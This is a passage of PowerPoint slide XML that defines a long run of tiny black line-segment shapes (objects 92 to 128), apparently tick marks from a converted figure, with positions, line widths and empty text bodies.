          <p:cNvPr id="92" name="object 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908020" y="5723209"/>
            <a:ext cx="0" cy="10067"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="5080">
                <a:moveTo>
                  <a:pt x="-2706" y="2305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="2305"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4611">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="object 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935876" y="5729392"/>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94" name="object 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935875" y="5726985"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963234" y="5729392"/>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96" name="object 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963233" y="5726985"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="object 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991140" y="5729666"/>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98" name="object 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991139" y="5727478"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="object 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018992" y="5729929"/>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100" name="object 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018991" y="5728025"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="object 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046900" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="object 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046899" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="object 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074805" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="object 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074804" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="object 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102657" y="5729929"/>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106" name="object 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102656" y="5728025"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="object 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130018" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="object 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130017" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="object 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2157924" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="object 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2157923" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="object 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2185776" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="object 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2185775" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="object 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213681" y="5729929"/>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114" name="object 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213680" y="5728025"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="object 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241536" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="object 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241534" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="object 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269441" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="object 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269440" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="object 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296800" y="5729392"/>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120" name="object 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296799" y="5726985"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="object 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324654" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="object 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324653" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="object 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352560" y="5729392"/>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124" name="object 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352558" y="5726985"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="object 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380465" y="5730203"/>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126" name="object 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380464" y="5728573"/>
            <a:ext cx="0" cy="3775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1905">
                <a:moveTo>
                  <a:pt x="-2706" y="952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="952"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="object 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2408317" y="5730203"/>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128" name="object 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
